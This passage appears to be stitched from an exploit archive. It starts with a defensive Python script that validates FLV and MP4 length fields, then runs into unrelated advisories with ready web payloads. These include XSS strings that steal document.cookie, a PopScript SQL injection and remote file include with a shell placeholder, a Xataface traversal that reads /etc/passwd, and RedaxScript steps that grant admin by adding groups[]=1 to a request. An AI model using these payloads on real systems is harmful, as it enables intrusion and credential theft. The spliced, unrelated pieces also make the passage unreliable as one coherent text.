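Both crash PoCs above (jetAudio's fault.mp4 and Winamp's fault.flv) hand a media player a container whose length fields do not match its contents, and the Winamp disassembly shows the faulting code assembling a big-endian value byte by byte from a pointer (ecx) that points at unmapped memory. The following Python is an added example, not part of either PoC: the check a hardened parser or a triage script should make, walking FLV tags and MP4 boxes and validating every declared size against the bytes actually present, including the size-below-header case that makes a naive MP4 loop stall. The sample files are constructed inline and are not the PoC bytes.

```python
import struct


def parse_flv(data):
    """Walk FLV tags, validating every length field against the bytes actually present.
    Returns (tags, warnings); each tag is (tag_type, data_size, timestamp_ms, offset)."""
    tags, warnings = [], []
    if len(data) < 9 or data[:3] != b"FLV":
        raise ValueError("not an FLV file")
    flags, header_len = data[4], struct.unpack(">I", data[5:9])[0]
    if flags & ~0x05:                                  # only the audio/video bits are defined
        warnings.append("reserved header flag bits set: 0x%02x" % flags)
    if not 9 <= header_len <= len(data):
        raise ValueError("DataOffset %d lies outside the file" % header_len)
    pos, prev_size = header_len, 0
    while pos + 4 <= len(data):
        claimed = struct.unpack(">I", data[pos:pos + 4])[0]   # PreviousTagSize
        if claimed != prev_size:
            warnings.append("PreviousTagSize at 0x%x is %d, expected %d" % (pos, claimed, prev_size))
        pos += 4
        if pos == len(data):
            break                                      # clean end of file
        if pos + 11 > len(data):
            warnings.append("truncated tag header at 0x%x" % pos)
            break
        tag_type = data[pos] & 0x1F
        data_size = int.from_bytes(data[pos + 1:pos + 4], "big")
        timestamp = int.from_bytes(data[pos + 4:pos + 7], "big") | (data[pos + 7] << 24)
        body = pos + 11
        if body + data_size > len(data):               # a trusting parser would read past the buffer here
            warnings.append("tag at 0x%x claims %d data bytes but only %d remain"
                            % (pos, data_size, len(data) - body))
            break
        tags.append((tag_type, data_size, timestamp, pos))
        prev_size, pos = 11 + data_size, body + data_size
    return tags, warnings


def parse_mp4_boxes(data):
    """Walk top-level ISO BMFF boxes (size:4 BE, type:4). size 0 means 'to end of file',
    size 1 means a 64-bit largesize follows; any other size below the header length is
    invalid and would make a naive loop stall or step backwards."""
    boxes, warnings = [], []
    pos = 0
    while pos + 8 <= len(data):
        size, btype = struct.unpack(">I4s", data[pos:pos + 8])
        header = 8
        if size == 1:
            if pos + 16 > len(data):
                warnings.append("largesize header truncated at 0x%x" % pos)
                break
            size, header = struct.unpack(">Q", data[pos + 8:pos + 16])[0], 16
        elif size == 0:
            size = len(data) - pos
        if size < header:
            warnings.append("box %s at 0x%x has impossible size %d" % (btype, pos, size))
            break
        if pos + size > len(data):
            warnings.append("box %s at 0x%x claims %d bytes but only %d remain"
                            % (btype, pos, size, len(data) - pos))
            break
        boxes.append((btype, size, pos))
        pos += size
    return boxes, warnings


# ---- constructed samples (not the PoC bytes) ----

def flv_tag(tag_type, body, timestamp=0):
    """11-byte FLV tag header + body; the caller appends PreviousTagSize."""
    return (bytes([tag_type]) + len(body).to_bytes(3, "big")
            + (timestamp & 0xFFFFFF).to_bytes(3, "big") + bytes([timestamp >> 24])
            + b"\x00\x00\x00" + body)


def flv_file(tags):
    out = bytearray(b"FLV\x01\x05\x00\x00\x00\x09" + b"\x00\x00\x00\x00")   # header + PreviousTagSize0
    for tag in tags:
        out += tag + len(tag).to_bytes(4, "big")
    return bytes(out)


def mp4_box(btype, payload, size=None):
    size = 8 + len(payload) if size is None else size
    return size.to_bytes(4, "big") + btype + payload


SCRIPT_TAG = flv_tag(18, b"\x02\x00\x0aonMetaData\x08\x00\x00\x00\x00\x00\x00\x09")  # empty ECMA array
VIDEO_TAG = flv_tag(9, b"\x12" + b"\xff" * 15)
GOOD_FLV = flv_file([SCRIPT_TAG, VIDEO_TAG])
# DataSize rewritten to 0x9E (158) while only 16 body bytes follow
BAD_FLV = (flv_file([SCRIPT_TAG]) + VIDEO_TAG[:1] + (0x9E).to_bytes(3, "big")
           + VIDEO_TAG[4:] + len(VIDEO_TAG).to_bytes(4, "big"))

GOOD_MP4 = mp4_box(b"ftyp", b"mp42\x00\x00\x00\x00mp42isom") + mp4_box(b"free", b"")
BAD_MP4 = mp4_box(b"ftyp", b"mp42\x00\x00\x00\x00", size=0xFA)   # claims 250 bytes, has 16
LOOP_MP4 = mp4_box(b"ftyp", b"mp42\x00\x00\x00\x00") + mp4_box(b"moov", b"", size=4)

if __name__ == "__main__":
    for name, blob, fn in (("good.flv", GOOD_FLV, parse_flv), ("bad.flv", BAD_FLV, parse_flv),
                           ("good.mp4", GOOD_MP4, parse_mp4_boxes), ("bad.mp4", BAD_MP4, parse_mp4_boxes),
                           ("loop.mp4", LOOP_MP4, parse_mp4_boxes)):
        print(name, fn(blob))
```

Run either walker over fault.flv or fault.mp4 before loading it into a debugger: the first warning tells you which length field the player trusted, which is where to start when turning a crash into a root cause.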
            
source: https://www.securityfocus.com/bid/48109/info

Nakid CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Nakid CMS 1.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/cms/assets/addons/kcfinder/browse.php?CKEditorFuncNum=0);alert(0);// 
            
source: https://www.securityfocus.com/bid/48110/info

Multiple WordPress WooThemes (Live Wire) are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/wp-content/themes/_theme's_name_/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
            
source: https://www.securityfocus.com/bid/48113/info

PopScript is prone to a remote file-include vulnerability, an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. 

http://www.example.com/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON 
            
source: https://www.securityfocus.com/bid/48118/info

Squiz Matrix is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Squiz Matrix 4.0.6 and 4.2.2 are vulnerable; other versions may also be affected. 

http://www.example.com/__lib/html_form/colour_picker.php?colour=';%20alert(document.cookie);%20var%20x='&pickerid=000000 
            
source: https://www.securityfocus.com/bid/48126/info

Xataface is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

NOTE (July 4, 2011): The vendor indicates that this issue affects versions prior to Xataface 1.2.6, while the reporter indicates 1.3rc1 and 1.3rc2 are affected. 

http://www.example.com/index.php?-action=../../../../../../etc/passwd%00 
            
# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
# Date: 11-05-2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: http://redaxscript.com/
# Version: 2.1.0
# Tested on: Windows 8

#Privilege Escalation in RedaxScript 2.1.0


RedaxScript 2.1.0 suffers from a privilege escalation vulnerability. The issue occurs because the application fails to properly implement access controls and fails to validate user-supplied input before processing it; together these flaws allow vertical privilege escalation by simply tampering with parameter values. An attacker can exploit this issue to gain elevated privileges in the application.

*Steps to reproduce:*

·         Log in as a non-admin user.

·         Go to the account page and submit an account update.

·         Intercept the request, add “*groups[]=1*” to the POST data and submit the request.

·         Log out of the application and log in again. You can now browse the application with admin privileges.

This vulnerability was addressed in the following commit.

https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified


*Timeline*:

09-26-2014:         Issue identified

09-27-2014:         Discussion with the vendor

10-27-2014:         Issue confirmed

11-05-2014:         Patch released.




Author:                                Shyamkumar Somana
Vendor Homepage:        http://redaxscript.com/download
Version:                               2.1.0
Tested on:                          Windows 7

-- 

about.me/shyamkumar.somana

Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam |
in.linkedin.com/in/sshyamkumar/ |